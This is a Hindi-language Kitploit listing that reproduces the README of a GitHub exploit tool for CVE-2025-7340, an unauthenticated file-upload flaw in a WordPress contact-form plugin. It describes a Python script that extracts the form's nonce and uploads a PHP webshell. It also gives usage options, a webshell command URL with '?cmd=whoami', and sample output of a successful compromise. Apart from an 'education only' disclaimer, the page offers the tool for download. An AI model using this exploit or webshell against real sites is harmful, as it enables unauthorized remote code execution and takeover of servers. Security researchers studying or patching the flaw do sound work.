Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-7340 — HT Contact Form Widget For Elementor Page Builder & Gutenberg Blocks & Form Builder. <= 2.2.1 - अनधिकृत मनमाना फ़ाइल अपलोड | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2025-7340
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubnxploited/cve-2025-7340

CVE-2025-7340

HT Contact Form Widget For Elementor Page Builder & Gutenberg Blocks & Form Builder. <= 2.2.1 - अनधिकृत मनमाना फ़ाइल अपलोड

रिपॉजिटरी देखें
731 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🚨 HT Contact Form Widget <= 2.2.1 - अप्रमाणित मनमाना फ़ाइल अपलोड (CVE-2025-7340)

CVE: CVE-2025-7340
CVSS: 9.8 (गंभीर)

📝 विवरण

वर्डप्रेस के लिए HT Contact Form Widget For Elementor Page Builder & Gutenberg Blocks & Form Builder. प्लगइन में temp_file_upload फंक्शन में फ़ाइल प्रकार सत्यापन की कमी के कारण सभी संस्करणों में 2.2.1 तक मनमाना फ़ाइल अपलोड की संवेदनशीलता है।

यह अप्रमाणित हमलावरों को सर्वर पर मनमानी फ़ाइलें अपलोड करने की अनुमति देता है, जिससे संभावित रूप से दूरस्थ कोड निष्पादन (RCE) हो सकता है।


⚡ शोषण स्क्रिप्ट

इस रिपॉजिटरी में एक Python शोषण स्क्रिप्ट शामिल है जो संवेदनशील फॉर्म की खोज को स्वचालित करती है और प्रभावित साइट पर एक वेबशेल अपलोड करती है।

स्क्रिप्ट आवश्यक पैरामीटर (nonce, form_id, ajax endpoint) को बुद्धिमानी से पहचानती है और संवेदनशील पथ में एक PHP शेल अपलोड करती है।

✅ संवेदनशील फॉर्म URL उदाहरण:

http://target.com/contact/

✅ संवेदनशील फॉर्म उस पृष्ठ पर होना चाहिए जिसे आप -u विकल्प को देते हैं।


📦 आवश्यकताएँ

स्क्रिप्ट चलाने से पहले, आवश्यक Python मॉड्यूल स्थापित करें:

pip install -r requirements.txt

Content of requirements.txt:

requests
colorama

🧰 उपयोग

usage: CVE-2025-7340.py [-h] 

Exploit for CVE-2025-7340 - Unauthenticated Arbitrary File Upload | by Khaled Alenazi (Nxploited)

options:
  -h, --help     show this help message and exit
  -u, --url URL  Target URL e.g http(s)://target.com

विकल्प:

विकल्पविवरण
-h, --helpयह सहायता संदेश दिखाएं और बाहर निकलें
-u, --url URLलक्ष्य URL जैसे http(s)://target.com/contact

🐚 वेबशेल उपयोग

एक बार शोषण सफलतापूर्वक समाप्त हो जाने पर, आप दिए गए पथ पर अपने अपलोड किए गए शेल तक पहुँच सकते हैं।

सिस्टम कमांड निष्पादित करने के लिए ?cmd=<your_command> जोड़ें।

✅ उदाहरण:

http://target.com/wp-content/uploads/ht_form/temp/shell.php?cmd=whoami

🖥️ उदाहरण आउटपुट

Starting exploit against target...
Fetching target page...
Extracting parameters...
Extracted Nonce: 346c441903
AJAX Endpoint: http://nxploit.ddev.site/wp-admin/admin-ajax.php
Form ID: 86
Generating webshell...
Uploading shell, please wait...

[+] Exploit Successfully!

Go to: wp-content/uploads/ht_form/temp/687590d90ac1c-shell.php

Exploit by: Khaled Alenazi (Nxploited) - GitHub: https://github.com/Nxploited

🛑 अस्वीकरण

यह उपकरण केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए प्रदान किया गया है।
लेखक इस कोड के किसी भी नुकसान या दुरुपयोग के लिए जिम्मेदार नहीं है।
किसी भी सिस्टम के विरुद्ध परीक्षण करने से पहले हमेशा स्पष्ट अनुमति लें।


👨‍💻 द्वारा

Khaled Alenazi (Nxploited)
GitHub: Nxploited

टूल डाउनलोड करें